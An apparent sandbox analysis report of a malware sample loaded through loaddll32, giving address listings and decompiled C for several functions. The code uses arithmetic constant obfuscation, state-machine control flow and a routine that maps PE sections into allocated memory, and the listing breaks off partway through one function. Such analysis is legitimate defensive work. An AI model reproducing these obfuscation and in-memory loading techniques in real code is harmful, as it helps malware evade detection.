                                                                                                          0x02af036d
                                                                                                          0x02af0375
                                                                                                          0x02af037d
                                                                                                          0x02af0385
                                                                                                          0x02af038d
                                                                                                          0x02af039a
                                                                                                          0x02af039d
                                                                                                          0x02af03a1
                                                                                                          0x02af03ae
                                                                                                          0x02af03b2
                                                                                                          0x02af03ba
                                                                                                          0x02af03c2
                                                                                                          0x02af03ca
                                                                                                          0x02af03d2
                                                                                                          0x02af03d7
                                                                                                          0x02af03df
                                                                                                          0x02af03ec
                                                                                                          0x02af03f0
                                                                                                          0x02af03f8
                                                                                                          0x02af0400
                                                                                                          0x02af0405
                                                                                                          0x02af040d
                                                                                                          0x02af0415
                                                                                                          0x02af0422
                                                                                                          0x02af0426
                                                                                                          0x02af042e
                                                                                                          0x02af0436
                                                                                                          0x02af0442
                                                                                                          0x02af0445
                                                                                                          0x02af0449
                                                                                                          0x02af0451
                                                                                                          0x02af0459
                                                                                                          0x02af0461
                                                                                                          0x02af0469
                                                                                                          0x02af0471
                                                                                                          0x02af0479
                                                                                                          0x02af0481
                                                                                                          0x02af0486
                                                                                                          0x02af048e
                                                                                                          0x02af0496
                                                                                                          0x02af049e
                                                                                                          0x02af04a6
                                                                                                          0x02af04ae
                                                                                                          0x02af04b6
                                                                                                          0x02af04be
                                                                                                          0x02af04c6
                                                                                                          0x02af04cb
                                                                                                          0x02af04d3
                                                                                                          0x02af04db
                                                                                                          0x02af04e3
                                                                                                          0x02af04eb
                                                                                                          0x02af04f3
                                                                                                          0x02af04fb
                                                                                                          0x02af0503
                                                                                                          0x02af0507
                                                                                                          0x02af050f
                                                                                                          0x02af0517
                                                                                                          0x02af0524
                                                                                                          0x02af0528
                                                                                                          0x02af0530
                                                                                                          0x02af0535
                                                                                                          0x02af053d
                                                                                                          0x02af054a
                                                                                                          0x02af0557
                                                                                                          0x02af0560
                                                                                                          0x02af0564
                                                                                                          0x02af056c
                                                                                                          0x02af0574
                                                                                                          0x02af057c
                                                                                                          0x02af0584
                                                                                                          0x02af058c
                                                                                                          0x02af0594
                                                                                                          0x02af0594
                                                                                                          0x02af05a6
                                                                                                          0x02af06c4
                                                                                                          0x00000000
                                                                                                          0x02af05ac
                                                                                                          0x02af05ae
                                                                                                          0x02af069a
                                                                                                          0x02af06ad
                                                                                                          0x02af06b1
                                                                                                          0x02af06b6
                                                                                                          0x02af06b9
                                                                                                          0x02af06bb
                                                                                                          0x02af06bd
                                                                                                          0x00000000
                                                                                                          0x02af06bd
                                                                                                          0x02af05b4
                                                                                                          0x02af05b4
                                                                                                          0x02af05b6
                                                                                                          0x00000000
                                                                                                          0x02af05bc
                                                                                                          0x02af05ce
                                                                                                          0x02af05d3
                                                                                                          0x02af05dc
                                                                                                          0x02af05e7
                                                                                                          0x02af05eb
                                                                                                          0x02af05fe
                                                                                                          0x02af066c
                                                                                                          0x02af0684
                                                                                                          0x02af0689
                                                                                                          0x02af068c
                                                                                                          0x00000000
                                                                                                          0x02af068c
                                                                                                          0x02af05b6
                                                                                                          0x02af05ae
                                                                                                          0x00000000
                                                                                                          0x02af05a6
                                                                                                          0x02af06cf
                                                                                                          0x02af06da
                                                                                                          0x02af06e0
                                                                                                          0x02af06e5
                                                                                                          0x02af06e5
                                                                                                          0x02af06e5
                                                                                                          0x02af06f2
                                                                                                          0x02af06fd

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -$7+$A|6$D$D41$ch$iD${I
                                                                                                          • API String ID: 0-1622838380
                                                                                                          • Opcode ID: 5c591b674e1f7a7a67c7d8f5d05ba0339d4c434ce35d74a93ee52fbe50cc6228
                                                                                                          • Instruction ID: 58ddd236a9271ad794cc36ab469d74de097fb9b5f1059dcc90085417f289f6b8
                                                                                                          • Opcode Fuzzy Hash: 5c591b674e1f7a7a67c7d8f5d05ba0339d4c434ce35d74a93ee52fbe50cc6228
                                                                                                          • Instruction Fuzzy Hash: E2D10EB25083819FD3A8CF61C989A1BFBE1FBC5358F508A1DF69596260D7B58948CF02
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF27F9, Relevance: 10.2, Strings: 8, Instructions: 232COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AF27F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E02AFDC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E02AF09DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E02AE856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E02AFE1F8(0x2ae1000, _v1064, __eflags);
						_t267 =  *0x2b06214; // 0x0
						_t253 =  *0x2b06214; // 0x0
						E02B02D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E02AFFECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0x2b06214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E02AEA445();
					goto L8;
				}
				E02AE1CA1(_v1112, _v1132, _v1072,  &_v520);
				E02AF654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}










































                                                                                                          0x02af27f9
                                                                                                          0x02af27ff
                                                                                                          0x02af2809
                                                                                                          0x02af280e
                                                                                                          0x02af2813
                                                                                                          0x02af281b
                                                                                                          0x02af2823
                                                                                                          0x02af2831
                                                                                                          0x02af2835
                                                                                                          0x02af283d
                                                                                                          0x02af284b
                                                                                                          0x02af2850
                                                                                                          0x02af2856
                                                                                                          0x02af285e
                                                                                                          0x02af2866
                                                                                                          0x02af286b
                                                                                                          0x02af2873
                                                                                                          0x02af2880
                                                                                                          0x02af2883
                                                                                                          0x02af2887
                                                                                                          0x02af288c
                                                                                                          0x02af2894
                                                                                                          0x02af289c
                                                                                                          0x02af28ac
                                                                                                          0x02af28b0
                                                                                                          0x02af28b8
                                                                                                          0x02af28c0
                                                                                                          0x02af28c8
                                                                                                          0x02af28d0
                                                                                                          0x02af28dc
                                                                                                          0x02af28df
                                                                                                          0x02af28e3
                                                                                                          0x02af28eb
                                                                                                          0x02af28f3
                                                                                                          0x02af28fd
                                                                                                          0x02af2901
                                                                                                          0x02af2909
                                                                                                          0x02af2911
                                                                                                          0x02af291e
                                                                                                          0x02af2922
                                                                                                          0x02af292a
                                                                                                          0x02af2937
                                                                                                          0x02af293b
                                                                                                          0x02af2943
                                                                                                          0x02af2948
                                                                                                          0x02af2950
                                                                                                          0x02af2958
                                                                                                          0x02af2960
                                                                                                          0x02af2968
                                                                                                          0x02af2970
                                                                                                          0x02af2978
                                                                                                          0x02af2985
                                                                                                          0x02af2989
                                                                                                          0x02af2991
                                                                                                          0x02af2999
                                                                                                          0x02af29a1
                                                                                                          0x02af29a9
                                                                                                          0x02af29b1
                                                                                                          0x02af29be
                                                                                                          0x02af29c2
                                                                                                          0x02af29cc
                                                                                                          0x02af29d9
                                                                                                          0x02af29e3
                                                                                                          0x02af29f0
                                                                                                          0x02af29f8
                                                                                                          0x02af2a00
                                                                                                          0x02af2a08
                                                                                                          0x02af2a10
                                                                                                          0x02af2a18
                                                                                                          0x02af2a20
                                                                                                          0x02af2a28
                                                                                                          0x02af2a33
                                                                                                          0x02af2a36
                                                                                                          0x02af2a3a
                                                                                                          0x02af2a42
                                                                                                          0x02af2a4a
                                                                                                          0x02af2a52
                                                                                                          0x02af2a5a
                                                                                                          0x02af2a62
                                                                                                          0x02af2a6c
                                                                                                          0x02af2a70
                                                                                                          0x02af2a78
                                                                                                          0x02af2a80
                                                                                                          0x02af2a88
                                                                                                          0x02af2a8d
                                                                                                          0x02af2a95
                                                                                                          0x02af2a9d
                                                                                                          0x02af2aa2
                                                                                                          0x02af2aaa
                                                                                                          0x02af2ab2
                                                                                                          0x02af2aba
                                                                                                          0x02af2ac2
                                                                                                          0x02af2aca
                                                                                                          0x02af2acf
                                                                                                          0x02af2ad4
                                                                                                          0x02af2adc
                                                                                                          0x02af2ae4
                                                                                                          0x02af2ae9
                                                                                                          0x02af2aee
                                                                                                          0x02af2af6
                                                                                                          0x02af2afe
                                                                                                          0x02af2b06
                                                                                                          0x02af2b0e
                                                                                                          0x02af2b16
                                                                                                          0x02af2b1e
                                                                                                          0x02af2b26
                                                                                                          0x02af2b2b
                                                                                                          0x02af2b33
                                                                                                          0x02af2b41
                                                                                                          0x02af2c06
                                                                                                          0x02af2b70
                                                                                                          0x02af2b70
                                                                                                          0x00000000
                                                                                                          0x02af2b70
                                                                                                          0x02af2b4d
                                                                                                          0x02af2c70
                                                                                                          0x02af2c7d
                                                                                                          0x02af2c7f
                                                                                                          0x00000000
                                                                                                          0x02af2c8e
                                                                                                          0x02af2b55
                                                                                                          0x02af2b84
                                                                                                          0x02af2b8d
                                                                                                          0x02af2b91
                                                                                                          0x02af2b99
                                                                                                          0x02af2b9e
                                                                                                          0x02af2bc3
                                                                                                          0x02af2bd6
                                                                                                          0x02af2bf0
                                                                                                          0x02af2bf5
                                                                                                          0x02af2bf8
                                                                                                          0x00000000
                                                                                                          0x02af2bf8
                                                                                                          0x02af2b5d
                                                                                                          0x02af2b74
                                                                                                          0x02af2b7b
                                                                                                          0x02af2b7f
                                                                                                          0x00000000
                                                                                                          0x02af2b7f
                                                                                                          0x02af2b61
                                                                                                          0x02af2c52
                                                                                                          0x02af2c52
                                                                                                          0x02af2c58
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af2c58
                                                                                                          0x02af2b6b
                                                                                                          0x00000000
                                                                                                          0x02af2b6b
                                                                                                          0x02af2c24
                                                                                                          0x02af2c45
                                                                                                          0x02af2c4a
                                                                                                          0x02af2c4d
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
                                                                                                          • API String ID: 0-2581693823
                                                                                                          • Opcode ID: b9a73cc51a9d778c29345af40b3fb3ba73ec7e282299877208fd1376b8b9e9eb
                                                                                                          • Instruction ID: 88d3bb30e197407d8731a5d214b8e734b7aca4a1f15266938aa4ee601e943a45
                                                                                                          • Opcode Fuzzy Hash: b9a73cc51a9d778c29345af40b3fb3ba73ec7e282299877208fd1376b8b9e9eb
                                                                                                          • Instruction Fuzzy Hash: F3C12EB14083418FC3A8CF65C68951BBBF1FBD4758F108A1DF69A96260D7B58A09CF83
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B03263, Relevance: 10.2, Strings: 8, Instructions: 175COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02B03263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E02B0287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E02AF62C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E02AFC9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
						E02AFC9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

































                                                                                                          0x02b03268
                                                                                                          0x02b0326c
                                                                                                          0x02b03270
                                                                                                          0x02b03272
                                                                                                          0x02b03276
                                                                                                          0x02b03277
                                                                                                          0x02b03278
                                                                                                          0x02b03279
                                                                                                          0x02b0327e
                                                                                                          0x02b03288
                                                                                                          0x02b0328d
                                                                                                          0x02b03298
                                                                                                          0x02b0329d
                                                                                                          0x02b032a3
                                                                                                          0x02b032ab
                                                                                                          0x02b032b3
                                                                                                          0x02b032bf
                                                                                                          0x02b032c4
                                                                                                          0x02b032ca
                                                                                                          0x02b032cf
                                                                                                          0x02b032d7
                                                                                                          0x02b032df
                                                                                                          0x02b032e7
                                                                                                          0x02b032ec
                                                                                                          0x02b032f1
                                                                                                          0x02b032f9
                                                                                                          0x02b03305
                                                                                                          0x02b0330a
                                                                                                          0x02b03310
                                                                                                          0x02b03318
                                                                                                          0x02b0331d
                                                                                                          0x02b03325
                                                                                                          0x02b0332d
                                                                                                          0x02b03335
                                                                                                          0x02b0333a
                                                                                                          0x02b03342
                                                                                                          0x02b0334a
                                                                                                          0x02b03352
                                                                                                          0x02b0335a
                                                                                                          0x02b0335f
                                                                                                          0x02b03367
                                                                                                          0x02b0336f
                                                                                                          0x02b03377
                                                                                                          0x02b0337f
                                                                                                          0x02b03387
                                                                                                          0x02b0338f
                                                                                                          0x02b03397
                                                                                                          0x02b0339f
                                                                                                          0x02b033a7
                                                                                                          0x02b033af
                                                                                                          0x02b033b7
                                                                                                          0x02b033bf
                                                                                                          0x02b033cb
                                                                                                          0x02b033ce
                                                                                                          0x02b033d2
                                                                                                          0x02b033da
                                                                                                          0x02b033e2
                                                                                                          0x02b033ea
                                                                                                          0x02b033ee
                                                                                                          0x02b033f6
                                                                                                          0x02b033fe
                                                                                                          0x02b0340b
                                                                                                          0x02b03418
                                                                                                          0x02b0341b
                                                                                                          0x02b0341f
                                                                                                          0x02b03427
                                                                                                          0x02b03437
                                                                                                          0x02b0343b
                                                                                                          0x02b03443
                                                                                                          0x02b0344b
                                                                                                          0x02b03453
                                                                                                          0x02b03460
                                                                                                          0x02b03461
                                                                                                          0x02b03465
                                                                                                          0x02b0346d
                                                                                                          0x02b03475
                                                                                                          0x02b0347d
                                                                                                          0x02b03485
                                                                                                          0x02b03495
                                                                                                          0x02b03499
                                                                                                          0x02b034a1
                                                                                                          0x02b034ad
                                                                                                          0x02b034b1
                                                                                                          0x02b034b6
                                                                                                          0x02b034b8
                                                                                                          0x02b034bd
                                                                                                          0x02b034ea
                                                                                                          0x02b034ec
                                                                                                          0x02b034f1
                                                                                                          0x02b03557
                                                                                                          0x00000000
                                                                                                          0x02b03559
                                                                                                          0x02b03508
                                                                                                          0x02b03511
                                                                                                          0x02b0351b
                                                                                                          0x02b03520
                                                                                                          0x02b03552
                                                                                                          0x02b0353a
                                                                                                          0x02b03547
                                                                                                          0x02b0354c
                                                                                                          0x02b0354f
                                                                                                          0x02b0354f
                                                                                                          0x00000000
                                                                                                          0x02b03556
                                                                                                          0x02b0355f

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !$$P$'?9$@$Wqg$_~W$vr$J
                                                                                                          • API String ID: 0-3966742547
                                                                                                          • Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                                                                                                          • Instruction ID: 49a7796305403b2752317c23a18197a6476067fee8ed7e543c2e0bab5740c988
                                                                                                          • Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
                                                                                                          • Instruction Fuzzy Hash: 63813171508340AFC358CF66C88981BBBF2FBC5758F10991DFA99862A0D3B6D945CF06
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B017BD, Relevance: 9.1, Strings: 7, Instructions: 356COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02B017BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E02AFFE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
